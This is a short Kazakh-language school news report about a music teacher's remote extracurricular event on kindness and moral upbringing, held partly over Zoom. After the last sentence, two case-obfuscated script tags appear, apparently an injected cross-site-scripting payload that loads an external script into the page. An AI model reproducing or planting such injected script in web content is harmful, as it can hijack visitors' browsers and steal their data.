Эстетикалық цикл апталығы аясында музыка пәні мұғалімі Айтенова Д.К. «Мейірімділік әлемді құтқарады» тақырыбында қашықтықтан, сабақтан тыс іс-шара өткізді. Іс-шараның мақсаты: Оқушының бойына рухани-адамгершілік қасиеттерді ұялату, жақсы-жаманды ажырата білуге, адамдық асыл қасиеттерді игеруге ықпал ету. Бір-бірімен қарым-қатынастарын жақсарту, оларды адамгершілікке, шыншылдыққа, мейірімділікке тәрбиелеп, шығармашылық қиялын, ой-өрісін, есте сақтау, жүйелі ойлауын дамыта отырып, танымдық қабілеттерін жетілдіру. Іс-шараға мектеп оқушылары белсене қатысыты. Оның ішінде бастауыш сынып оқушылары видео арқылы, 5 «А» сынып оқушылары ZOOM платформасы арқылы ой өрбітіп, тақырыпты игерді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>